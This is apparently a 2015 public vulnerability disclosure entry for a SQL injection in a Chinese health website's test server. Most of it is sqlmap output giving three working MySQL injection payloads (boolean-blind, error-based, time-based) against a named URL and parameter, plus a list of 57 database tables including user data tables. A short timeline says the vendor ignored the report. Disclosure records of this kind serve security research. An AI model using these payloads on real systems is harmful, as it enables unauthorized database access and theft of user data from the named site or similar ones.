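2015-12-22: Details reported to the vendor; awaiting vendor response
2015-12-27: The vendor actively ignored the vulnerability; details disclosed to the public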
http://test.fh21.com.cn/index.php?a=countNum&aa=1&c=index&m=zzzc
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: aa (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: a=countNum&aa=(SELECT (CASE WHEN (3463=3463) THEN 3463 ELSE 3463*(SELECT 3463 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&c=index&m=zzzc

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: a=countNum&aa=1 AND (SELECT 7449 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (ELT(7449=7449,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&c=index&m=zzzc

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: a=countNum&aa=1 AND (SELECT * FROM (SELECT(SLEEP(5)))eYTM)&c=index&m=zzzc
---
back-end DBMS: MySQL 5.0
Database: fh21_test
[57 tables]
+---------------------------+
| user                      |
| breakfast                 |
| breakfast_info            |
| food                      |
| food_list                 |
| food_type                 |
| lunch                     |
| lunch_info                |
| supper                    |
| supper_info               |
| tools_cdjk_body           |
| tools_cdjk_category       |
| tools_cdjk_disease        |
| tools_cdjk_food           |
| tools_food_list           |
| tools_food_type           |
| tools_hyzj_maincate       |
| tools_hyzj_question       |
| tools_hyzj_res            |
| tools_hyzj_subcate        |
| tools_hyzj_topic          |
| tools_jkzc_category       |
| tools_jkzc_question       |
| tools_jkzc_symptom        |
| tools_pingce_answers      |
| tools_pingce_question     |
| tools_pingce_result       |
| tools_pingce_topic        |
| tools_scbd_class          |
| tools_scbd_cookbook       |
| tools_scbd_dapei          |
| tools_scbd_food           |
| tools_scbd_food_nutrition |
| tools_scbd_nutrition      |
| tools_scbd_tag            |
| tools_scbd_tag_index      |
| tools_sex_answers         |
| tools_sex_question        |
| tools_sex_result          |
| tools_sex_topic           |
| tools_static_topic        |
| tools_xbzjz_body          |
| tools_xbzjz_category      |
| tools_xbzjz_disease       |
| tools_xbzjz_res           |
| tools_zhengzhuang         |
| tools_zice                |
| tools_zzjcq_category      |
| tools_zzjcq_clue          |
| tools_zzjcq_question      |
| tools_zzjcq_symptom       |
| tools_zzzc_answer         |
| tools_zzzc_question       |
| tools_zzzc_topic          |
| user_food                 |
| user_info                 |
| user_sport                |
+---------------------------+
Severity: No impact (ignored by vendor)
Ignored at: 2015-12-27 16:44
Vulnerability Rank: 4 (WooYun rating)
None yet